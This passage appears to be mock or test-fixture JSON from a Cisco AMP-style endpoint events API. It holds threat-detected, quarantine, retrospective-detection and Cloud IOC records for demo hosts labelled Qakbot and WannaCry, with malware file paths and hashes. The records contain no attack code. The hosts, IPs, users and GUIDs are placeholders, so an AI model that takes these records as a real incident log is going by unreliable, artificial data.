Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":542000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} 